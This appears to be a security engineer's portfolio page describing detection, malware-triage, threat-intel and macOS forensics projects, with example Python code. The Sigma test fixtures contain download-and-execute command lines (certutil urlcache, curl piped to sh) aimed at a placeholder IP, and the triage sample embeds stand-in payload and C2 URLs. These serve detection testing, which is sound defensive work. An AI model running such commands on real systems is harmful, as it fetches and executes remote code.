Malware analysis, DFIR, threat intelligence, and detection engineering.
Four-plus years of security engineering for the USAF, including building and running in-house software. Three years of SIGINT analysis at NSA. Pivoting to security software engineering in 2026/2027.
Security software engineer with four-plus years in USAF cyber operations and three years of SIGINT analysis at NSA. Active TS/SCI clearance with counterintelligence polygraph. GIAC-certified in reverse engineering (GREM), exploit research (GXPN), forensics (GCFA), and network forensics (GNFA).
I build detection pipelines, endpoint security software, and backend services that translate analyst workflows into systems that run. Python is my primary language; Go for services; Rust for systems programming that needs zero dependencies.
Pursuing a B.S. in Software Engineering at WGU, expected August 2026. Separating from the Air Force in 2027 and relocating to California for a pure software engineering role.
Detection-as-code repository covering Sigma rules organized by attacker TTP across endpoint logs, host syscalls, and Defender XDR. Python pytest harness with per-framework adapters generates tests from rule files; collection-time fixture validation makes it structurally impossible to ship a rule without its tests. GitHub Actions CI gates every commit. Per-rule decision docs capture threat model and false-positive profile.
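The collection-time gate described above, as an added example that is not the repository's own harness: every rule must have a positive and a negative fixture before any test runs, and each fixture event is replayed through a simplified Sigma selection matcher (field modifiers contains/startswith/endswith, `|all`, and conditions of the form `X` or `X and not Y`). The rules, fixtures, field names, and the `MissingFixture` error are constructed for illustration.

```python
"""Added example: pair every Sigma-style rule with a fixture at collection time,
then replay the fixture's events through a simplified selection matcher.
Rules, fixtures and field names are constructed, not taken from any repo."""
from __future__ import annotations

from typing import Any


class MissingFixture(Exception):
    """Raised during collection when a rule lacks a positive or negative fixture."""


# Constructed rules. Subset of Sigma handled here: a 'detection' map of named
# selections plus a condition of the form "X" or "X and not Y".
RULES: dict[str, dict[str, Any]] = {
    "proc_creation_win_certutil_download": {
        "title": "Certutil used to fetch a remote file",
        "logsource": {"product": "windows", "category": "process_creation"},
        "detection": {
            "selection": {
                "Image|endswith": "\\certutil.exe",
                "CommandLine|contains|all": ["urlcache", "http"],
            },
            "condition": "selection",
        },
    },
    "proc_creation_lnx_curl_pipe_sh": {
        "title": "curl output piped into a shell (build account excluded)",
        "logsource": {"product": "linux", "category": "process_creation"},
        "detection": {
            "selection": {"CommandLine|contains|all": ["curl ", "| sh"]},
            "filter": {"User": "builder"},
            "condition": "selection and not filter",
        },
    },
}

# Constructed fixtures keyed by rule id; each event is a flat field map.
FIXTURES: dict[str, dict[str, list[dict[str, str]]]] = {
    "proc_creation_win_certutil_download": {
        "positive": [{"Image": r"C:\Windows\System32\certutil.exe",
                      "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"}],
        "negative": [{"Image": r"C:\Windows\System32\certutil.exe",
                      "CommandLine": "certutil -verify cert.cer"}],
    },
    "proc_creation_lnx_curl_pipe_sh": {
        "positive": [{"User": "www-data", "Image": "/bin/sh",
                      "CommandLine": "sh -c 'curl -s http://198.51.100.7/x | sh'"}],
        "negative": [{"User": "builder", "Image": "/bin/sh",
                      "CommandLine": "sh -c 'curl -s http://198.51.100.7/x | sh'"}],
    },
}


def _match_one(value: str, pattern: str, modifier: str | None) -> bool:
    """Sigma string comparisons are case-insensitive; no modifier means equality."""
    v, p = value.lower(), pattern.lower()
    if modifier is None:
        return v == p
    if modifier == "contains":
        return p in v
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "endswith":
        return v.endswith(p)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection: dict[str, Any], event: dict[str, str]) -> bool:
    """Every field in a selection must match; list values are OR unless '|all'."""
    for key, expected in selection.items():
        field, *mods = key.split("|")
        want_all = "all" in mods
        modifier = next((m for m in mods if m != "all"), None)
        value = event.get(field)
        if value is None:
            return False
        patterns = expected if isinstance(expected, list) else [expected]
        hits = [_match_one(str(value), str(p), modifier) for p in patterns]
        if not (all(hits) if want_all else any(hits)):
            return False
    return True


def rule_matches(rule: dict[str, Any], event: dict[str, str]) -> bool:
    detection = rule["detection"]
    cond = detection["condition"].split()
    if len(cond) == 1:
        return selection_matches(detection[cond[0]], event)
    if len(cond) == 4 and cond[1:3] == ["and", "not"]:
        return (selection_matches(detection[cond[0]], event)
                and not selection_matches(detection[cond[3]], event))
    raise ValueError(f"unsupported condition: {detection['condition']}")


def collect_cases(rules: dict[str, Any], fixtures: dict[str, Any]) -> list[tuple[str, dict[str, str], bool]]:
    """Collection-time gate: a rule without both fixture kinds aborts collection."""
    cases: list[tuple[str, dict[str, str], bool]] = []
    for rule_id in sorted(rules):
        fx = fixtures.get(rule_id, {})
        if not fx.get("positive") or not fx.get("negative"):
            raise MissingFixture(f"{rule_id}: needs positive and negative fixtures")
        cases += [(rule_id, e, True) for e in fx["positive"]]
        cases += [(rule_id, e, False) for e in fx["negative"]]
    return cases


def run_cases(rules: dict[str, Any], cases: list[tuple[str, dict[str, str], bool]]) -> list[str]:
    """Return a description of each failing case; an empty list means all pass."""
    return [f"{rid}: expected match={exp}" for rid, ev, exp in cases
            if rule_matches(rules[rid], ev) != exp]
```

In a pytest harness, `pytest_generate_tests(metafunc)` would call `collect_cases` and hand the result to `metafunc.parametrize`, so a missing fixture raises before a single test is run rather than silently yielding zero tests for that rule.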
Format-agnostic static analysis pipeline for malware triage. Extracts file hashes, printable strings, and IOC patterns — IPs, URLs, domains, file artifacts — via a two-pass modular extractor architecture. Outputs deterministic, deduplicated JSON for downstream automation.
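The two-pass extractor architecture described above, as an added example that is not the project's own pipeline: pass 1 runs extractors over the raw bytes (hashes, ASCII and UTF-16LE strings), pass 2 runs IOC patterns over the pass-1 strings, and every list is deduplicated and sorted before serialisation so identical input always yields byte-identical JSON. The IOC regexes, the short TLD list, and the sample file bytes are constructed for illustration.

```python
"""Added example: two-pass static triage extractor (hashes and strings from
bytes, IOCs from strings) with deterministic, deduplicated JSON output.
Patterns and the sample bytes are constructed for the example."""
from __future__ import annotations

import hashlib
import json
import re
import sys
from collections.abc import Callable

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")          # runs of >= 4 printable bytes
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # UTF-16LE printable runs

# Pass-2 IOC patterns. All groups are non-capturing so findall() returns whole matches.
IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    "url": re.compile(r"\bhttps?://[^\s\"'<>]+", re.I),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|ru|info)\b", re.I),  # short TLD list
    "file": re.compile(r"\b[\w-]+\.(?:exe|dll|bat|ps1|vbs)\b", re.I),
}


def extract_hashes(data: bytes) -> dict[str, str]:
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def extract_strings(data: bytes) -> list[str]:
    """Narrow and wide strings, deduplicated and sorted for determinism."""
    found = {m.group().decode("ascii") for m in ASCII_RE.finditer(data)}
    found |= {m.group().decode("utf-16-le") for m in WIDE_RE.finditer(data)}
    return sorted(found)


def extract_iocs(strings: list[str]) -> dict[str, list[str]]:
    """Pass 2: pattern-match the already-extracted strings, not the raw bytes."""
    out: dict[str, set[str]] = {name: set() for name in IOC_PATTERNS}
    for s in strings:
        for name, rx in IOC_PATTERNS.items():
            out[name].update(rx.findall(s))
    return {name: sorted(vals) for name, vals in out.items()}


# Modular registration: pass-1 extractors take bytes, pass-2 extractors take strings.
RAW_EXTRACTORS: list[tuple[str, Callable[[bytes], object]]] = [
    ("hashes", extract_hashes),
    ("strings", extract_strings),
]
STRING_EXTRACTORS: list[tuple[str, Callable[[list[str]], object]]] = [
    ("iocs", extract_iocs),
]


def triage(data: bytes) -> dict:
    report: dict = {"size": len(data)}
    for name, fn in RAW_EXTRACTORS:
        report[name] = fn(data)
    for name, fn in STRING_EXTRACTORS:
        report[name] = fn(report["strings"])
    return report


def to_json(report: dict) -> str:
    """sort_keys plus pre-sorted lists make the document stable across runs."""
    return json.dumps(report, sort_keys=True, indent=2)


# Constructed sample: PE-like header bytes, narrow strings, one wide string, junk.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"This program cannot be run in DOS mode.\x00\x00"
    + b"kernel32.dll\x00\x00"
    + b"192.168.1.10\x00\x00"
    + b"http://evil.example.com/payload.exe\x00\x00"
    + "http://c2.example.net/beacon".encode("utf-16-le") + b"\x00\x00"
    + b"\xff\xfe\x01\x02"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(to_json(triage(data)))
```

Keeping pass 2 off the raw bytes matters in practice: a URL split across a narrow and a wide string, or a string that only exists after UTF-16LE decoding, is invisible to a byte-level regex, and running the IOC patterns once over a deduplicated string set is also far cheaper on large samples.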
Python CLI that converts unstructured threat-research text into deterministic structured threat intelligence via the Anthropic API. A Pydantic schema serves as the single source of truth: it generates the tool's input_schema and validates the response, eliminating drift between the API contract and the parser. Forced tool-use on every call; malformed model output raises an explicit ValidationError. Source provenance and extraction metadata are included in the output envelope.
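The single-source-of-truth pattern described above, as an added example that is not the CLI's own code. The real tool uses Pydantic; this stand-alone version keeps one JSON Schema dict as the source of truth, sends that same object as the tool's `input_schema`, forces the tool with `tool_choice`, and validates the returned `tool_use` input with a small stdlib checker so it runs with no third-party packages. The tool name, schema fields, model placeholder, and the response blocks (dicts mimicking the SDK's ToolUseBlock fields, not captured API output) are constructed assumptions.

```python
"""Added example: one schema drives the tool definition sent to the Messages
API and the validation of the tool_use input that comes back. Stdlib-only
stand-in for the Pydantic approach; responses below are constructed."""
from __future__ import annotations

import re
from datetime import datetime, timezone
from typing import Any


class ValidationError(ValueError):
    """Model output that does not satisfy the schema."""


TOOL_NAME = "record_threat_report"  # assumed tool name

# Single source of truth: JSON Schema for the tool's input (fields are illustrative).
THREAT_REPORT_SCHEMA: dict[str, Any] = {
    "type": "object",
    "additionalProperties": False,
    "required": ["threat_actor", "malware_families", "ttps", "iocs"],
    "properties": {
        "threat_actor": {"type": "string"},
        "malware_families": {"type": "array", "items": {"type": "string"}},
        "ttps": {"type": "array", "items": {"type": "string", "pattern": r"^T\d{4}(?:\.\d{3})?$"}},
        "iocs": {"type": "array", "items": {
            "type": "object", "additionalProperties": False, "required": ["type", "value"],
            "properties": {"type": {"type": "string", "enum": ["ipv4", "domain", "url", "sha256"]},
                           "value": {"type": "string"}}}},
    },
}


def tool_definition() -> dict[str, Any]:
    """Entry for tools=[...]; input_schema is the very same schema object."""
    return {"name": TOOL_NAME, "description": "Record structured threat intelligence.",
            "input_schema": THREAT_REPORT_SCHEMA}


def request_kwargs(text: str, model: str) -> dict[str, Any]:
    """Keyword arguments for client.messages.create(); tool_choice forces the tool."""
    return {"model": model, "max_tokens": 2048, "tools": [tool_definition()],
            "tool_choice": {"type": "tool", "name": TOOL_NAME},
            "messages": [{"role": "user", "content": text}]}


_TYPES = {"object": dict, "array": list, "string": str, "integer": int, "boolean": bool}


def validate(value: Any, schema: dict[str, Any], path: str = "$") -> None:
    """Check the JSON Schema subset used above; raise ValidationError on mismatch."""
    t = schema.get("type")
    if t is not None:
        if not isinstance(value, _TYPES[t]) or (t == "integer" and isinstance(value, bool)):
            raise ValidationError(f"{path}: expected {t}, got {type(value).__name__}")
    if "enum" in schema and value not in schema["enum"]:
        raise ValidationError(f"{path}: {value!r} not in {schema['enum']}")
    if "pattern" in schema and not re.search(schema["pattern"], value):
        raise ValidationError(f"{path}: {value!r} does not match {schema['pattern']}")
    if t == "object":
        for key in schema.get("required", []):
            if key not in value:
                raise ValidationError(f"{path}.{key}: required")
        props = schema.get("properties", {})
        if schema.get("additionalProperties", True) is False and set(value) - set(props):
            raise ValidationError(f"{path}: unexpected keys {sorted(set(value) - set(props))}")
        for key, sub in props.items():
            if key in value:
                validate(value[key], sub, f"{path}.{key}")
    if t == "array" and "items" in schema:
        for i, item in enumerate(value):
            validate(item, schema["items"], f"{path}[{i}]")


def parse_response(content: list[dict[str, Any]], source: str) -> dict[str, Any]:
    """Extract the forced tool call from response content blocks and wrap it."""
    calls = [b for b in content if b.get("type") == "tool_use" and b.get("name") == TOOL_NAME]
    if len(calls) != 1:
        raise ValidationError(f"expected exactly one {TOOL_NAME} call, got {len(calls)}")
    report = calls[0]["input"]
    validate(report, THREAT_REPORT_SCHEMA)  # same object that went out as input_schema
    return {"source": source, "extracted_at": datetime.now(timezone.utc).isoformat(),
            "tool": TOOL_NAME, "report": report}


# Constructed stand-ins for response.content (dicts with ToolUseBlock's fields).
GOOD_RESPONSE = [{"type": "tool_use", "id": "toolu_example", "name": TOOL_NAME,
                  "input": {"threat_actor": "Example Group", "malware_families": ["ExampleRAT"],
                            "ttps": ["T1059.001", "T1105"],
                            "iocs": [{"type": "domain", "value": "c2.example.net"}]}}]
BAD_RESPONSE = [{"type": "tool_use", "id": "toolu_example", "name": TOOL_NAME,
                 "input": {"threat_actor": "Example Group", "malware_families": [],
                           "ttps": ["Phishing"], "iocs": []}}]  # ttps entry fails the pattern
```

Because `request_kwargs` and `parse_response` reference the same `THREAT_REPORT_SCHEMA` object, a field added to the schema is simultaneously required of the model and checked on the way back; there is no second copy to fall out of sync.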
Modular macOS forensic artifact collector. Eight independent modules covering persistence mechanisms, process snapshots, code signing metadata, TCC permissions, extended attributes, credential artifacts, and Unified Log analysis. Zero third-party dependencies; read-only collection model.